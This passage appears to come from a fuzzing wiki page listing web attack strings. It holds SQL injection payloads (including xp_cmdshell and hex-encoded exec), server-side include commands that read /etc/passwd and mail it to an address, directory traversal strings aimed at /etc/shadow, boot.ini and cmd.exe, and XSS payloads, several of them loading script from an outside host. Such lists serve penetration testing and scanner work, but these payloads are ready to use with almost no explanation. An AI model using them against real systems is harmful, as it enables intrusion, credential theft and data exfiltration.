/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4) ===<br />
<pre><br />
# Some server side include statements<br />
# Foobar@email.de<br />
<br />
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre><br />
<br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
